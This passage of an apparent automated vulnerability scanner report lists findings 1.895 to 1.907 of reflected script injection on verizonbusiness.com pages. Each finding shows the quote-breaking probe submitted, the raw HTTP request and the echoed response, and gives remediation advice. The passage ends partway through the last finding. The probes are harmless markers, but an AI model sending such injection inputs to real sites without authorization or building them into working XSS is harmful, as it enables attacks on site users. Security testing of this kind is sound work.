Last-Modified: Wed, 17 Nov 2010 00:38:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41870
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneed22d58';16f52457063/performance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.895. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/performance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2299'%3bc779c0202d8 was submitted in the REST URL parameter 3. This input was echoed as c2299';c779c0202d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/performancec2299'%3bc779c0202d8/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:06 GMT
Content-Type: text/html
Content-Length: 41924
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneed/performancec2299';c779c0202d8/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.896. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/performance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a39d5"%3b8f683864c2d was submitted in the REST URL parameter 3. This input was echoed as a39d5";8f683864c2d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/performancea39d5"%3b8f683864c2d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41922
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed/performancea39d5";8f683864c2d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.897. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/risk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5841"%3b554a50ba9a7 was submitted in the REST URL parameter 1. This input was echoed as e5841";554a50ba9a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionse5841"%3b554a50ba9a7/byneed/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:22 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionse5841";554a50ba9a7/byneed/risk/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.898. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/risk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87a8d'%3bbef071f3cb9 was submitted in the REST URL parameter 1. This input was echoed as 87a8d';bef071f3cb9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions87a8d'%3bbef071f3cb9/byneed/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions87a8d';bef071f3cb9/byneed/risk/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.899. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/risk/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e72af'%3b25136d1f348 was submitted in the REST URL parameter 2. This input was echoed as e72af';25136d1f348 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneede72af'%3b25136d1f348/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41856
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneede72af';25136d1f348/risk/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.900. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/risk/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2ec3"%3b87b0ae20f7 was submitted in the REST URL parameter 2. This input was echoed as c2ec3";87b0ae20f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneedc2ec3"%3b87b0ae20f7/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:42 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41852
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneedc2ec3";87b0ae20f7/risk/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.901. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/risk/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a054'%3b03f607810c5 was submitted in the REST URL parameter 3. This input was echoed as 9a054';03f607810c5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/risk9a054'%3b03f607810c5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41908
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneed/risk9a054';03f607810c5/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.902. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/risk/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64381"%3bb1a418d2647 was submitted in the REST URL parameter 3. This input was echoed as 64381";b1a418d2647 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/risk64381"%3bb1a418d2647/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:39:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41908
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed/risk64381";b1a418d2647/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.903. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/sustainability/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42a1b'%3b157729166ce was submitted in the REST URL parameter 1. This input was echoed as 42a1b';157729166ce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions42a1b'%3b157729166ce/byneed/sustainability/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions42a1b';157729166ce/byneed/sustainability/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.904. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/sustainability/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 647dc"%3b17769e56e6d was submitted in the REST URL parameter 1. This input was echoed as 647dc";17769e56e6d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions647dc"%3b17769e56e6d/byneed/sustainability/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions647dc";17769e56e6d/byneed/sustainability/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.905. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/sustainability/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec353"%3b0861a94b65e was submitted in the REST URL parameter 2. This input was echoed as ec353";0861a94b65e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneedec353"%3b0861a94b65e/sustainability/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:58 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41874
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneedec353";0861a94b65e/sustainability/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.906. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/sustainability/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9042'%3bd5b3e9cd73c was submitted in the REST URL parameter 2. This input was echoed as d9042';d5b3e9cd73c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneedd9042'%3bd5b3e9cd73c/sustainability/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:06 GMT
Content-Type: text/html
Content-Length: 41876
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneedd9042';d5b3e9cd73c/sustainability/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.907. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/sustainability/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df1cb"%3b0597c569708 was submitted in the REST URL parameter 3. This input was echoed as df1cb";0597c569708 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/sustainabilitydf1cb"%3b0597c569708/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:39:30 GMT
